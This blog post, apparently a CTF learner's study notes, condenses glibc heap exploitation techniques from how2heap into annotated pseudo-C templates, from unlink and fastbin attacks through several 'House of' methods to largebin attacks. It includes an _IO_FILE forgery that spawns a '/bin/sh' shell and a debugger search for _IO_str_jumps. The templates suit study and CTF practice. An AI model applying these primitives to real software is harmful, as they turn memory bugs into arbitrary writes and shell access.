
The Glibc Heap Playbook (Preview)

Spring drowsiness has arrived right on cue again. Ever-longer mornings in bed and cheap caffeine have failed to drive off the long-accumulated dark circles under my eyes, so all that's left is to pin my hopes on cold showers and the futile exercise of piling up words.

Last week I read an excellent paper, Automatic Techniques to Systematically Discover New Heap Exploitation Primitives, which describes the authors' work on automatically discovering exploitation techniques in various heap allocators. I haven't fully worked through the implementation details yet, but the way the paper expresses each exploitation technique is eye-opening. Since my own glibc heap exploitation has long been stuck at the level of opening with a fastbin attack no matter what, every challenge of this kind costs me a lot of time on English reading comprehension (mostly how2heap); even when I spot the vulnerability at a glance, it still takes half a day to confirm the attack direction and start writing the exploit.
For a tactical gap like this, one not caused by any difference in intelligence, there is no cure except more summarizing and organizing. So I spent a few days reorganizing the common attacks from how2heap into this preview of The Glibc Heap Playbook, following the format the paper provides.

Note: all of the code below exists to describe the exploitation techniques; it cannot be compiled or tested as-is.
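
For reference, here is a minimal sketch of the chunk layout and the helper names used throughout (raw_to_chunk and malloc_size_to_chunk_size are this playbook's shorthand for glibc's internal mem2chunk and request2size; the struct mirrors malloc/malloc.c, assuming x64):

struct malloc_chunk {
  size_t prev_size;                 // size of the previous chunk, valid only if it is free
  size_t size;                      // chunk size plus A|M|P flag bits
  struct malloc_chunk *fd;          // free-list links
  struct malloc_chunk *bk;
  struct malloc_chunk *fd_nextsize; // largebin-only links
  struct malloc_chunk *bk_nextsize;
};

// user pointer -> chunk header (glibc's mem2chunk)
#define raw_to_chunk(p) \
  ((struct malloc_chunk *)((char *)(p) - 2 * sizeof(size_t)))

// request size -> chunk size (glibc's request2size on x64:
// add 8 header bytes, round up to 16, minimum 0x20)
#define malloc_size_to_chunk_size(req) \
  (((req) + sizeof(size_t) + 15 < 32) ? 32 \
                                      : (((req) + sizeof(size_t) + 15) & ~(size_t)15))
#define chunk_size(req) malloc_size_to_chunk_size(req)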

First, let's look at how the paper above expresses the Unlink attack:

// [PRE-CONDITION]
// sz: any non-fast-bin size
// dst: where to write (void*)
// val: target value (ptr to writable memory)
// [BUG] buffer overflow (p1)
// [POST-CONDITION] *dst = val
void *p1 = malloc(sz);
void *p2 = malloc(sz);

struct malloc_chunk *fake = p1;
// bypassing (1): P->size == next_chunk(P)->prev_size
fake->size = sizeof(void*);
// bypassing (2): P->fd->bk == P && P->bk->fd == P
fake->fd = (void*)&p1 - offsetof(struct malloc_chunk, bk);
fake->bk = (void*)&p1 - offsetof(struct malloc_chunk, fd);

struct malloc_chunk *c2 = raw_to_chunk(p2);

// [BUG] overflowing p1: it shrinks the previous chunk's size,
// tricking 'fake' as the previous chunk
c2->prev_size = chunk_size(sz) - offsetof(struct malloc_chunk, fd);
// tricking the previous chunk as freed: P bit = 0
c2->size &= ~1;
// triggering unlink(fake) via backward consolidation
free(p2);

assert(p1 == (void*)&p1 - offsetof(struct malloc_chunk, bk));
// writing with p1: overwriting itself to dst
*(void**)(p1 + offsetof(struct malloc_chunk, bk)) = dst;
// writing with p1: overwriting *dst with val
*(void**)p1 = (void*)val;

assert(*dst == val);

So much clearer than the PoC on how2heap.
OK, what follows is the part I irresponsibly wrote myself.

Fastbin Attack

// [PRE-CONDITION]
// sz: fast-bin size
// dst: where to allocate fake chunk
// [BUG] Use-After-Free (or overflow into a freed chunk)
// [POST-CONDITION] malloc(sz) == dst
void *p1 = malloc(sz);
void *p2 = malloc(sz);

// fastbin is LIFO: fastbin -> p2 -> p1
free(p1);
free(p2);

struct malloc_chunk *fake = raw_to_chunk(dst);
// bypass "malloc(): memory corruption (fast)":
// fake->size must fall into the same fastbin as sz
fake->size = malloc_size_to_chunk_size(sz);

struct malloc_chunk *c2 = raw_to_chunk(p2);
// [BUG] Use-After-Free: overwrite p2->fd while it's in the fastbin,
// linking the fake chunk into the list: fastbin -> p2 -> fake
c2->fd = fake;

// the first malloc returns p2, the second returns the fake chunk
malloc(sz);
void *victim = malloc(sz);
assert(victim == dst);

House of Spirit

// [PRE-CONDITION]
// sz: fast-bin size
// dst: where to allocate fake chunk
// [BUG] Arbitrary Free
// [POST-CONDITION] malloc(sz) == dst

void *p1 = malloc(1);

struct malloc_chunk *fake_chunk = raw_to_chunk(dst);
struct malloc_chunk *fake_next = raw_to_chunk(dst + malloc_size_to_chunk_size(sz));

// bypass size check "free(): invalid size"
fake_chunk->size = malloc_size_to_chunk_size(sz);
// bypass "free(): invalid next size (fast), no need for fastbin size, > 2*SIZE_SZ(16 on x64) && < av->system_mem(<128kb)"
fake_nex->size = sz + 0x1234;

// [BUG] Arbitrary Free
free(dst);

void* victim = malloc(sz);
assert(victim == dst);

House of Lore

// [PRE-CONDITION]
// [TACTIC 1] sz1: (smallbin size) OR
// [TACTIC 2] sz2a: (fastbin size) and sz2b: (largebin size)
// dst: where to allocate fake chunk, dst2: where to place the fake->bk chunk to bypass the check
// [BUG] Use-After-Free
// [POST-CONDITION] malloc(sz1) == dst (or sz2a with [TACTIC 2])

// !!CHOOSE [TACTIC 1] OR [TACTIC 2] BASED ON SIZE PRECONDITION!!
// [TACTIC 1]: directly create smallbin chunk
void *p1 = malloc(sz1);
// prevent merge with top chunk
void *junk1 = malloc(0x10);
free(p1);
// p1 is now in the unsortedbin; request a size sz1a > sz1 so that
// p1 gets sorted into the smallbin instead of being returned
void *junk2 = malloc(sz1a);
// now p1 at smallbin
// [TACTIC 1] end.

// [TACTIC 2]: use fastbin and largebin to create smallbin
void *p1 = malloc(sz2a);
// prevent merge with top chunk
void *junk = malloc(0x10);
free(p1);
// p1 is now in the fastbin; a largebin-size request triggers
// malloc_consolidate(), which moves p1 into the smallbin
void *junk2 = malloc(sz2b);
// now p1 at smallbin
// [TACTIC 2] end.

struct malloc_chunk *fake = raw_to_chunk(dst);
struct malloc_chunk *fake2 = raw_to_chunk(dst2);
struct malloc_chunk *chunk1 = raw_to_chunk(p1);
// bypass 'chunk1->bk->fd == chunk1' check when p1's chunk is taken
fake->fd = chunk1;
// bypass 'fake->bk->fd == fake' check when the fake chunk is taken
fake->bk = fake2;
fake2->fd = fake;

// [BUG] Use-After-Free: overwrite p1's bk while it's in the smallbin,
// linking the fake chunk behind it: smallbin -> chunk1 -> fake
chunk1->bk = fake;

void *junk3 = malloc(sz1); // or sz2a; this one returns p1
void *victim = malloc(sz1); // or sz2a
assert(victim == dst);

House of Force

// [PRE-CONDITION]
// sz: arbitrary size
// dst: where the next allocation should land
// [BUG] Heap Overflow
// [POST-CONDITION] malloc(sz) == dst

void *p1 = malloc(sz);

struct malloc_chunk *top_chunk = raw_to_chunk(p1 + malloc_size_to_chunk_size(sz));
// [BUG] Heap Overflow: overwrite top_chunk->size.
top_chunk->size = -1;
// the subtraction may wrap around (integer overflow); that's fine
size_t request_size = (size_t)dst - (size_t)top_chunk - 3*sizeof(size_t);

// this request is carved from top, moving the top chunk to dst-0x10
malloc(request_size);
// the next allocation is then served from the relocated top chunk
void* victim = malloc(sz);
assert(victim == dst);

House of Einherjar

// [PRE-CONDITION]
// sz1: a size whose usable area ends right at the next chunk's size
//      field, i.e. ((sz1+8) % 0x10 == 0), e.g. 0x38
// dst: where to allocate fake chunk
// [BUG] Off-by-one Null
// [POST-CONDITION] malloc(sz) == dst

// the chunk used to perform the off-by-one null write
void* p1 = malloc(sz1);
size_t real_p1_size = malloc_usable_size(p1);

struct malloc_chunk *fake = raw_to_chunk(dst);
// placeholder values; fake->size is fixed up below so that
// chunksize(fake) == prev_size(next_chunk(fake)) holds during unlink
fake->prev_size = 0x100; // dst-0x10
fake->size = 0x100; // dst-0x8
// bypass 'fake->fd->bk == fake && fake->bk->fd == fake'
fake->fd = fake; // dst
fake->bk = fake; // dst+0x8
// largebin links, also checked by unlink() for non-smallbin sizes
fake->fd_nextsize = fake; // dst+0x10
fake->bk_nextsize = fake; // dst+0x18

// 0xf8 is the easy case: p2's chunk size will be 0x101, and the
// off-by-one null turns it into 0x100; sizes like 0x1f8 or 0x2f8
// work the same way, while other values would require forging yet
// another fake chunk inside this one.
void *p2 = malloc(0xf8);

// [BUG] Off-by-one null, change p2->size from 0x101 to 0x100
((char*)p1)[real_p1_size] = 0; // p1[0x38] = 0

// write fake p2->prev_size to end of p1
size_t fake_size = (size_t)((char*)p2 - 2*sizeof(size_t) - (char*)fake); // fake_size = p2-0x10-fake
*(size_t*)((char*)p1 + real_p1_size - sizeof(size_t)) = fake_size; // p1[0x38-8] = fake_size

// change fake->size according to calculated fake_size
fake->size = fake_size;
// free p2 and it will consolidate with our fake chunk
free(p2);

// malloc any size
void* victim = malloc(0x40);

assert(victim == dst);

House of Orange (Phase 1)

House of Orange has two phases: phase 1 creates an unsortedbin chunk without ever calling free; phase 2 uses an unsortedbin attack to hijack control flow.

// [PRE-CONDITION]
// sz: larger than the shrunk top chunk size
// [BUG] Heap Overflow
// [POST-CONDITION]
// the old top chunk ends up in the unsortedbin

// the initial top_chunk->size is usually 0x21000;
// after allocating a chunk of size 0x400,
// top_chunk->size = 0x20c01
void *p1 = malloc(0x400-0x10);

// [BUG] Heap Overflow: overwrite top_chunk->size
struct malloc_chunk *top_chunk = raw_to_chunk(p1 + 0x400);
// two conditions must be satisfied:
// 1. top chunk address + size has to be page-aligned
// 2. top chunk's prev_inuse bit has to be set
top_chunk->size = 0xc01;

// request sz > top_chunk->size (the new, shrunk value):
// sysmalloc() frees the old top chunk into the unsortedbin
malloc(sz); // e.g. malloc(0x1000)

assert(is_in_unsortedbin(top_chunk));

House of Orange (Phase 2)

This tactic can also be used to bypass the vtable check added in glibc 2.24: _IO_str_jumps lies inside the legitimate __libc_IO_vtables section, so IO_validate_vtable accepts it.

// [PRE-CONDITION]
// sz: any non-fastbin size
// [BUG] Heap Overflow
// [POST-CONDITION]
// call system('/bin/sh')
void *p1 = malloc(sz);
void *p2 = malloc(sz);
//avoid merge
malloc(0x10);

// move p2 to the unsorted bin
free(p2);

struct malloc_chunk *chunk2 = raw_to_chunk(p2);
_IO_FILE *fp = (_IO_FILE*) chunk2;
// [BUG] Heap Overflow p1 to overwrite p2's metadata
fp->flags = 0; // chunk2->prev_size; chunk2+0x0
fp->_IO_read_ptr = 0x61; // chunk2->size; chunk2+0x8

// The following overwrites could also be done via a UAF
fp->_IO_read_base = _IO_list_all-0x10; // chunk2+0x18; libc.symbols['_IO_list_all']
fp->_IO_write_base = 0; // chunk2+0x20
fp->_IO_write_ptr = 1; // chunk2+0x28
fp->_IO_buf_base = &bin_sh; // chunk2+0x38; next(libc.search('/bin/sh'))
fp->_mode = 0; // chunk2+0xc0
*(size_t*)((char*)chunk2+0xd8) = _IO_str_jumps - 8; // fp_plus->vtable
*(size_t*)((char*)chunk2+0xe8) = (size_t)&system; // _s._free_buffer, called as fn(fp->_IO_buf_base)

// trigger: malloc() aborts with an error message, but we still get a shell
malloc(0x10);

// get shell!

Appendix: How to Find _IO_str_jumps

pwndbg> p _IO_str_underflow
$1 = {<text variable, no debug info>} 0x7f4d4cf04790 <_IO_str_underflow>
pwndbg> search -p 0x7f4d4cf04790
libc.so.6 0x7f4d4d2240a0 0x7f4d4cf04790
libc.so.6 0x7f4d4d224160 0x7f4d4cf04790
libc.so.6 [0x7f4d4d2245e0] 0x7f4d4cf04790
pwndbg> p &_IO_file_jumps
$2 = (<data variable, no debug info> *) 0x7f4d4d224440 <_IO_file_jumps>

_IO_str_jumps > _IO_file_jumps, so the last hit of the search is the one we want.
_IO_str_jumps = 0x7f4d4d2245e0 - 0x20 = 0x7f4d4d2245c0
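
The 0x20 is just the offset of the __underflow slot inside glibc's jump table. A simplified sketch of the leading fields of struct _IO_jump_t (the real definition in libio/libioP.h uses function-pointer typedefs):

struct _IO_jump_t {
  size_t __dummy;     // +0x00
  size_t __dummy2;    // +0x08
  void *__finish;     // +0x10
  void *__overflow;   // +0x18
  void *__underflow;  // +0x20  <- the slot the search above hits
  // ... more entries
};

// so each search hit points at a __underflow slot, and
// &_IO_str_jumps == hit_address - 0x20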

Unsortedbin Into Stack

// [PRE-CONDITION]
// sz: any non-fastbin size
// dst: where to place the fake chunk (e.g. on the stack)
// [BUG] Heap Overflow
// [POST-CONDITION]
// malloc(sz) == dst + offsetof(struct malloc_chunk, fd)
void *p1 = malloc(sz);
void *p2 = malloc(sz);
//avoid merge
malloc(0x10);

// move p2 to the unsorted bin
free(p2);

// create a fake chunk at dst
struct malloc_chunk *fake = dst;
// set fake->size to be the chunk size of the last allocation
fake->size = malloc_size_to_chunk_size(sz);
// set fake->bk to any writable address to avoid crash
fake->bk = fake;

// [BUG] Heap Overflow p1
struct malloc_chunk *c2 = raw_to_chunk(p2);
// c2->size should be smaller than the chunk size of the next
// allocation, to avoid returning c2 in the next allocation;
// it also shouldn't be too small:
// must satisfy size > 2*SIZE_SZ (>16 on x64) && size < av->system_mem
c2->size = 4 * sizeof(size_t); // 0x20
// set the next pointer in the unsorted bin
c2->bk = fake;

// now unsorted bin: c2 -> fake,
// and c2 is too small for the request.
// therefore, next allocation returns the fake chunk
assert(malloc(sz) == (void*)fake + offsetof(struct malloc_chunk, fd));

Unsortedbin Attack

// [PRE-CONDITION]
// sz: non-fastbin size
// dst: where to overwrite
// [BUG] Use-After-Free
// [POST-CONDITION] *dst = a libc address (the unsortedbin head in main_arena, e.g. 0x7ffff7dd1b78)

void *p1 = malloc(sz);
// avoid merge with top chunk
void *p2 = malloc(0x10);

// p1 gets into unsortedbin.
free(p1);
struct malloc_chunk *chunk1 = raw_to_chunk(p1);
size_t target_value = chunk1->fd; // (e.g. 0x7ffff7dd1b78)
// [BUG] Use-After-Free: overwrite p1's bk while it's in the unsortedbin.
// x64: dst-0x10, x86: dst-0x8;
// chunk1->bk is at p1+0x8
chunk1->bk = dst-0x10;

void *p3 = malloc(sz);
assert(*dst == target_value);

Largebin Attack

// [PRE-CONDITION]
// sz1: largebin size, sz2: largebin size, sz1 < sz2
// dst1, dst2: where to overwrite
// [BUG] Heap Overflow
// [POST-CONDITION] *dst1, *dst2 -> heap_address (e.g. 0x4057a0)

void *p1 = malloc(sz1);
malloc(0x10); // avoid merge
// sz1 < sz2
void *p2 = malloc(sz2);
malloc(0x10); // avoid merge
void *p3 = malloc(sz2);
malloc(0x10); // avoid merge

free(p1);
free(p2);
// put p1,p2 in unsortedbin:
// unsortedbin_list->p2->p1

// malloc a size smaller than largebin size
malloc(0x90);
// allocate from p1; now p2 is in the largebin
// and p1's remainder is in the unsortedbin:
// largebin_list->p2; unsortedbin_list->p1_remain;

free(p3);
// put p3 in unsortedbin:
// unsortedbin_list->p3->p1_remain;

struct malloc_chunk *chunk2 = raw_to_chunk(p2);
// [BUG] Heap Overflow or Chunk Overlap:
// shrink chunk2->size below its original value (even 0 is ok)
chunk2->size = new_size; // new_size < original chunk2->size
chunk2->fd = 0;
chunk2->bk = dst1 - 0x10;
chunk2->fd_nextsize = 0;
chunk2->bk_nextsize = dst2 - 0x20;

// malloc a size smaller than largebin size again:
// sorting p3 into the largebin triggers the corrupted insertion
malloc(0x90);

// dst1 & dst2 has been overwritten with a heap address.
assert(*dst1 == heap_address);
assert(*dst2 == heap_address);